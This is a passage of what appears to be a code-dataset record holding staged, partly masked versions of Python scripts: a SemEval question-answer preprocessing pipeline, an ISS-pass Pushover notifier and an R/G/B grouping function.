word_emb_file = (config.fasttext_file if config.fasttext else config.\n glove_word_file)\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = (config.glove_dim if config.pretrained_char else config.\n char_dim)\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, 'r') as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, 'word',\n emb_file=word_emb_file, size=config.glove_word_size, vec_size=\n config.glove_dim, token2idx_dict=word2idx_dict)\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, 'r') as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(char_counter, 'char',\n emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim,\n token2idx_dict=char2idx_dict)\n build_features_SemEval(config, train_examples, 'train', config.\n train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, 'dev', config.\n dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, 'test',\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.dev_meta, dev_meta, message='dev meta')\n save(config.word2idx_file, word2idx_dict, message='word2idx')\n save(config.char2idx_file, char2idx_dict, message='char2idx')\n save(config.test_meta, test_meta, message='test meta')\n save('data/test.json', dev_examples, message='test example')\n",
"step-3": "<mask token>\n\n\ndef word_tokenize(sent):\n doc = nlp(sent)\n return [token.text for token in doc]\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print('Token {} cannot be found'.format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False\n ):\n print('Generating {} examples...'.format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, 'r') as fh:\n for l in fh:\n ques, ans, label = l.strip().split('\\t')\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {'ans_tokens': ans_tokens, 'ans_chars': ans_chars,\n 'ques_tokens': ques_tokens, 'ques_chars': ques_chars, 'y':\n label, 'id': total}\n examples.append(example)\n if random:\n random.shuffle(examples)\n print('{} questions in total'.format(len(examples)))\n return examples\n\n\ndef get_embedding(counter, data_type, limit=-1, emb_file=None, size=None,\n vec_size=None, token2idx_dict=None):\n print('Generating {} embedding...'.format(data_type))\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n if emb_file is not None:\n assert size is not None\n assert vec_size is not None\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > 
limit:\n embedding_dict[word] = vector\n print('{} / {} tokens have corresponding {} embedding vector'.\n format(len(embedding_dict), len(filtered_elements), data_type))\n else:\n assert vec_size is not None\n for token in filtered_elements:\n embedding_dict[token] = [np.random.normal(scale=0.01) for _ in\n range(vec_size)]\n print('{} tokens have corresponding embedding vector'.format(len(\n filtered_elements)))\n NULL = '--NULL--'\n OOV = '--OOV--'\n token2idx_dict = {token: idx for idx, token in enumerate(embedding_dict\n .keys(), 2)} if token2idx_dict is None else token2idx_dict\n token2idx_dict[NULL] = 0\n token2idx_dict[OOV] = 1\n embedding_dict[NULL] = [(0.0) for _ in range(vec_size)]\n embedding_dict[OOV] = [(0.0) for _ in range(vec_size)]\n idx2emb_dict = {idx: embedding_dict[token] for token, idx in\n token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\n\ndef build_features_SemEval(config, examples, data_type, out_file,\n word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example['ans_tokens']) > ans_limit or len(example[\n 'ques_tokens']) > ques_limit\n print('Processing {} examples...'.format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n total += 1\n context_idxs = np.zeros([ans_limit], dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return word2idx_dict[each]\n 
return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return char2idx_dict[char]\n return 1\n for i, token in enumerate(example['ans_tokens'][:ans_limit]):\n context_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ques_tokens'][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ans_chars'][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n for i, token in enumerate(example['ques_chars'][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n label = example['y']\n y = float(label)\n record = tf.train.Example(features=tf.train.Features(feature={\n 'ans_idxs': tf.train.Feature(bytes_list=tf.train.BytesList(\n value=[context_idxs.tostring()])), 'ques_idxs': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring\n ()])), 'ans_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[context_char_idxs.tostring()])),\n 'ques_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[ques_char_idxs.tostring()])), 'y': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).\n tostring()])), 'id': tf.train.Feature(int64_list=tf.train.\n Int64List(value=[example['id']]))}))\n writer.write(record.SerializeToString())\n print('Build {} / {} instances of features in total'.format(total, total_))\n meta['total'] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print('Saving {}...'.format(message))\n with open(filename, 'w') as fh:\n json.dump(obj, fh)\n\n\ndef preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(config.SemEval_train_file, 'train',\n word_counter, char_counter, shuffle=True)\n dev_examples = process_file(config.SemEval_dev_file, 'dev',\n word_counter, char_counter)\n test_examples = 
process_file(config.SemEval_test_file, 'test',\n word_counter, char_counter)\n word_emb_file = (config.fasttext_file if config.fasttext else config.\n glove_word_file)\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = (config.glove_dim if config.pretrained_char else config.\n char_dim)\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, 'r') as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, 'word',\n emb_file=word_emb_file, size=config.glove_word_size, vec_size=\n config.glove_dim, token2idx_dict=word2idx_dict)\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, 'r') as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(char_counter, 'char',\n emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim,\n token2idx_dict=char2idx_dict)\n build_features_SemEval(config, train_examples, 'train', config.\n train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, 'dev', config.\n dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, 'test',\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.dev_meta, dev_meta, message='dev meta')\n save(config.word2idx_file, word2idx_dict, message='word2idx')\n save(config.char2idx_file, char2idx_dict, message='char2idx')\n save(config.test_meta, test_meta, message='test meta')\n save('data/test.json', dev_examples, message='test example')\n",
"step-4": "<mask token>\nnlp = spacy.blank('en')\n\n\ndef word_tokenize(sent):\n doc = nlp(sent)\n return [token.text for token in doc]\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print('Token {} cannot be found'.format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False\n ):\n print('Generating {} examples...'.format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, 'r') as fh:\n for l in fh:\n ques, ans, label = l.strip().split('\\t')\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {'ans_tokens': ans_tokens, 'ans_chars': ans_chars,\n 'ques_tokens': ques_tokens, 'ques_chars': ques_chars, 'y':\n label, 'id': total}\n examples.append(example)\n if random:\n random.shuffle(examples)\n print('{} questions in total'.format(len(examples)))\n return examples\n\n\ndef get_embedding(counter, data_type, limit=-1, emb_file=None, size=None,\n vec_size=None, token2idx_dict=None):\n print('Generating {} embedding...'.format(data_type))\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n if emb_file is not None:\n assert size is not None\n assert vec_size is not None\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter 
and counter[word] > limit:\n embedding_dict[word] = vector\n print('{} / {} tokens have corresponding {} embedding vector'.\n format(len(embedding_dict), len(filtered_elements), data_type))\n else:\n assert vec_size is not None\n for token in filtered_elements:\n embedding_dict[token] = [np.random.normal(scale=0.01) for _ in\n range(vec_size)]\n print('{} tokens have corresponding embedding vector'.format(len(\n filtered_elements)))\n NULL = '--NULL--'\n OOV = '--OOV--'\n token2idx_dict = {token: idx for idx, token in enumerate(embedding_dict\n .keys(), 2)} if token2idx_dict is None else token2idx_dict\n token2idx_dict[NULL] = 0\n token2idx_dict[OOV] = 1\n embedding_dict[NULL] = [(0.0) for _ in range(vec_size)]\n embedding_dict[OOV] = [(0.0) for _ in range(vec_size)]\n idx2emb_dict = {idx: embedding_dict[token] for token, idx in\n token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\n\ndef build_features_SemEval(config, examples, data_type, out_file,\n word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example['ans_tokens']) > ans_limit or len(example[\n 'ques_tokens']) > ques_limit\n print('Processing {} examples...'.format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n total += 1\n context_idxs = np.zeros([ans_limit], dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return 
word2idx_dict[each]\n return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return char2idx_dict[char]\n return 1\n for i, token in enumerate(example['ans_tokens'][:ans_limit]):\n context_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ques_tokens'][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ans_chars'][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n for i, token in enumerate(example['ques_chars'][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n label = example['y']\n y = float(label)\n record = tf.train.Example(features=tf.train.Features(feature={\n 'ans_idxs': tf.train.Feature(bytes_list=tf.train.BytesList(\n value=[context_idxs.tostring()])), 'ques_idxs': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring\n ()])), 'ans_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[context_char_idxs.tostring()])),\n 'ques_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[ques_char_idxs.tostring()])), 'y': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).\n tostring()])), 'id': tf.train.Feature(int64_list=tf.train.\n Int64List(value=[example['id']]))}))\n writer.write(record.SerializeToString())\n print('Build {} / {} instances of features in total'.format(total, total_))\n meta['total'] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print('Saving {}...'.format(message))\n with open(filename, 'w') as fh:\n json.dump(obj, fh)\n\n\ndef preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(config.SemEval_train_file, 'train',\n word_counter, char_counter, shuffle=True)\n dev_examples = process_file(config.SemEval_dev_file, 'dev',\n word_counter, char_counter)\n 
test_examples = process_file(config.SemEval_test_file, 'test',\n word_counter, char_counter)\n word_emb_file = (config.fasttext_file if config.fasttext else config.\n glove_word_file)\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = (config.glove_dim if config.pretrained_char else config.\n char_dim)\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, 'r') as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, 'word',\n emb_file=word_emb_file, size=config.glove_word_size, vec_size=\n config.glove_dim, token2idx_dict=word2idx_dict)\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, 'r') as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(char_counter, 'char',\n emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim,\n token2idx_dict=char2idx_dict)\n build_features_SemEval(config, train_examples, 'train', config.\n train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, 'dev', config.\n dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, 'test',\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.dev_meta, dev_meta, message='dev meta')\n save(config.word2idx_file, word2idx_dict, message='word2idx')\n save(config.char2idx_file, char2idx_dict, message='char2idx')\n save(config.test_meta, test_meta, message='test meta')\n save('data/test.json', dev_examples, message='test example')\n",
"step-5": "import tensorflow as tf\nimport random\nfrom tqdm import tqdm\nimport spacy\nimport ujson as json\nfrom collections import Counter\nimport numpy as np\nimport os.path\n\nnlp = spacy.blank(\"en\")\n\n\ndef word_tokenize(sent):\n doc = nlp(sent)\n return [token.text for token in doc]\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print(\"Token {} cannot be found\".format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False):\n print(\"Generating {} examples...\".format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, \"r\") as fh:\n for l in fh:\n ques, ans, label = l.strip().split(\"\\t\")\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {\"ans_tokens\": ans_tokens,\n \"ans_chars\": ans_chars, \"ques_tokens\": ques_tokens,\n \"ques_chars\": ques_chars, \"y\":label, \"id\": total}\n \n examples.append(example)\n if random:\n random.shuffle(examples)\n print(\"{} questions in total\".format(len(examples)))\n return examples\n\n\ndef get_embedding(counter, data_type, limit=-1, emb_file=None, size=None, vec_size=None, token2idx_dict=None):\n print(\"Generating {} embedding...\".format(data_type))\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n if emb_file is not None:\n assert size is not None\n assert vec_size is not None\n with open(emb_file, \"r\", 
encoding=\"utf-8\") as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = \"\".join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n print(\"{} / {} tokens have corresponding {} embedding vector\".format(\n len(embedding_dict), len(filtered_elements), data_type))\n else:\n assert vec_size is not None\n for token in filtered_elements:\n embedding_dict[token] = [np.random.normal(\n scale=0.01) for _ in range(vec_size)]\n print(\"{} tokens have corresponding embedding vector\".format(\n len(filtered_elements)))\n\n NULL = \"--NULL--\"\n OOV = \"--OOV--\"\n token2idx_dict = {token: idx for idx, token in enumerate(\n embedding_dict.keys(), 2)} if token2idx_dict is None else token2idx_dict\n token2idx_dict[NULL] = 0\n token2idx_dict[OOV] = 1\n embedding_dict[NULL] = [0. for _ in range(vec_size)]\n embedding_dict[OOV] = [0. for _ in range(vec_size)]\n idx2emb_dict = {idx: embedding_dict[token]\n for token, idx in token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\n\ndef build_features_SemEval(config, examples, data_type, out_file, word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example[\"ans_tokens\"]) > ans_limit or len(example[\"ques_tokens\"]) > ques_limit\n\n print(\"Processing {} examples...\".format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n\n #if filter_func(example, is_test):\n # continue\n\n total += 1\n context_idxs = np.zeros([ans_limit], dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = 
np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n \n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return word2idx_dict[each]\n return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return char2idx_dict[char]\n return 1\n\n for i, token in enumerate(example[\"ans_tokens\"][:ans_limit]):\n context_idxs[i] = _get_word(token)\n\n for i, token in enumerate(example[\"ques_tokens\"][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n\n for i, token in enumerate(example[\"ans_chars\"][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n\n for i, token in enumerate(example[\"ques_chars\"][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n\n label = example[\"y\"]\n y = float(label)\n\n record = tf.train.Example(features=tf.train.Features(feature={\n \"ans_idxs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[context_idxs.tostring()])),\n \"ques_idxs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring()])),\n \"ans_char_idxs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[context_char_idxs.tostring()])),\n \"ques_char_idxs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ques_char_idxs.tostring()])),\n \"y\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).tostring()])),\n \"id\": tf.train.Feature(int64_list=tf.train.Int64List(value=[example[\"id\"]]))\n }))\n writer.write(record.SerializeToString())\n print(\"Build {} / {} instances of features in total\".format(total, total_))\n meta[\"total\"] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print(\"Saving {}...\".format(message))\n with open(filename, \"w\") as fh:\n json.dump(obj, fh)\n\n\ndef 
preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(\n config.SemEval_train_file, \"train\", word_counter, char_counter, shuffle=True)\n dev_examples = process_file(\n config.SemEval_dev_file, \"dev\", word_counter, char_counter)\n test_examples = process_file(\n config.SemEval_test_file, \"test\", word_counter, char_counter)\n\n word_emb_file = config.fasttext_file if config.fasttext else config.glove_word_file\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = config.glove_dim if config.pretrained_char else config.char_dim\n\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, \"r\") as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, \"word\", emb_file=word_emb_file,\n size=config.glove_word_size, vec_size=config.glove_dim, token2idx_dict=word2idx_dict)\n\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, \"r\") as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(\n char_counter, \"char\", emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim, token2idx_dict=char2idx_dict)\n\n build_features_SemEval(config, train_examples, \"train\",\n config.train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, \"dev\",\n config.dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, \"test\",\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n\n save(config.word_emb_file, word_emb_mat, message=\"word embedding\")\n save(config.char_emb_file, char_emb_mat, message=\"char embedding\")\n save(config.dev_meta, dev_meta, message=\"dev meta\")\n save(config.word2idx_file, word2idx_dict, 
message=\"word2idx\")\n save(config.char2idx_file, char2idx_dict, message=\"char2idx\")\n save(config.test_meta, test_meta, message=\"test meta\")\n save(\"data/test.json\", dev_examples, message=\"test example\") \n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message('ISS is over London: ' + x, title='ISS'
)
else:
break
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message('ISS is over London: ' + x, title='ISS'
)
else:
break
while True:
issCheck()
time.sleep(10)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
timeNow = time.strftime('%a %b %d, %I:%M %p').lstrip('0').replace(' 0', ' ')
client = Client(user_key, api_token=api_token)
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message('ISS is over London: ' + x, title='ISS'
)
else:
break
while True:
issCheck()
time.sleep(10)
<|reserved_special_token_1|>
import time
import datetime
from pushover import init, Client
from scraper import *
from config import *
timeNow = time.strftime('%a %b %d, %I:%M %p').lstrip('0').replace(' 0', ' ')
client = Client(user_key, api_token=api_token)
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message('ISS is over London: ' + x, title='ISS'
)
else:
break
while True:
issCheck()
time.sleep(10)
<|reserved_special_token_1|>
import time
import datetime
from pushover import init, Client
from scraper import *
from config import *
# Get the current time
timeNow = time.strftime("%a %b %d, %I:%M %p").lstrip("0").replace(" 0", " ")
# Initialise Pushover for notifications
client = Client(user_key, api_token=api_token)
# Loop for times of ISS passes and compare to current time
def issCheck():
for i in column.keys():
for x in column[i]:
if i == 'Date':
issNow = x
if issNow == timeNow:
client.send_message("ISS is over London: " + x, title="ISS")
else:
break
while True:
issCheck()
time.sleep(10)
|
flexible
|
{
"blob_id": "a573c6870392024ec2e84571ccb0bad3f5c4033a",
"index": 4261,
"step-1": "<mask token>\n\n\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message('ISS is over London: ' + x, title='ISS'\n )\n else:\n break\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message('ISS is over London: ' + x, title='ISS'\n )\n else:\n break\n\n\nwhile True:\n issCheck()\n time.sleep(10)\n",
"step-3": "<mask token>\ntimeNow = time.strftime('%a %b %d, %I:%M %p').lstrip('0').replace(' 0', ' ')\nclient = Client(user_key, api_token=api_token)\n\n\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message('ISS is over London: ' + x, title='ISS'\n )\n else:\n break\n\n\nwhile True:\n issCheck()\n time.sleep(10)\n",
"step-4": "import time\nimport datetime\nfrom pushover import init, Client\nfrom scraper import *\nfrom config import *\ntimeNow = time.strftime('%a %b %d, %I:%M %p').lstrip('0').replace(' 0', ' ')\nclient = Client(user_key, api_token=api_token)\n\n\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message('ISS is over London: ' + x, title='ISS'\n )\n else:\n break\n\n\nwhile True:\n issCheck()\n time.sleep(10)\n",
"step-5": "import time\nimport datetime\nfrom pushover import init, Client\nfrom scraper import *\nfrom config import *\n\n# Get the current time\ntimeNow = time.strftime(\"%a %b %d, %I:%M %p\").lstrip(\"0\").replace(\" 0\", \" \")\n\n# Initialise Pushover for notifications\nclient = Client(user_key, api_token=api_token)\n\n\n# Loop for times of ISS passes and compare to current time\ndef issCheck():\n for i in column.keys():\n for x in column[i]:\n if i == 'Date':\n issNow = x\n if issNow == timeNow:\n client.send_message(\"ISS is over London: \" + x, title=\"ISS\")\n else:\n break\n\n\nwhile True:\n issCheck()\n time.sleep(10)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def group(arr):
low, mid, high = 0, 0, len(arr) - 1
while mid <= high:
print(arr)
if arr[mid] == 'R':
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 'G':
mid += 1
else:
arr[high], arr[mid] = arr[mid], arr[high]
high -= 1
return arr
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def group(arr):
low, mid, high = 0, 0, len(arr) - 1
while mid <= high:
print(arr)
if arr[mid] == 'R':
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 'G':
mid += 1
else:
arr[high], arr[mid] = arr[mid], arr[high]
high -= 1
return arr
<|reserved_special_token_0|>
print(group(arr))
<|reserved_special_token_1|>
def group(arr):
low, mid, high = 0, 0, len(arr) - 1
while mid <= high:
print(arr)
if arr[mid] == 'R':
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 'G':
mid += 1
else:
arr[high], arr[mid] = arr[mid], arr[high]
high -= 1
return arr
*arr, = map(str, input('enter the list of R, G, B').split())
print(group(arr))
<|reserved_special_token_1|>
def group(arr):
low, mid, high = 0, 0, len(arr)-1
while mid <= high:
print(arr)
if arr[mid] == 'R' :
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 'G':
mid += 1
else:
arr[high], arr[mid] = arr[mid], arr[high]
high -= 1
return arr
*arr, = map(str, input("enter the list of R, G, B").split())
print(group(arr))
|
flexible
|
{
"blob_id": "8ad47bf292e0046550cc0ef6f6bb75cf179ebd4b",
"index": 7477,
"step-1": "<mask token>\n",
"step-2": "def group(arr):\n low, mid, high = 0, 0, len(arr) - 1\n while mid <= high:\n print(arr)\n if arr[mid] == 'R':\n arr[low], arr[mid] = arr[mid], arr[low]\n low += 1\n mid += 1\n elif arr[mid] == 'G':\n mid += 1\n else:\n arr[high], arr[mid] = arr[mid], arr[high]\n high -= 1\n return arr\n\n\n<mask token>\n",
"step-3": "def group(arr):\n low, mid, high = 0, 0, len(arr) - 1\n while mid <= high:\n print(arr)\n if arr[mid] == 'R':\n arr[low], arr[mid] = arr[mid], arr[low]\n low += 1\n mid += 1\n elif arr[mid] == 'G':\n mid += 1\n else:\n arr[high], arr[mid] = arr[mid], arr[high]\n high -= 1\n return arr\n\n\n<mask token>\nprint(group(arr))\n",
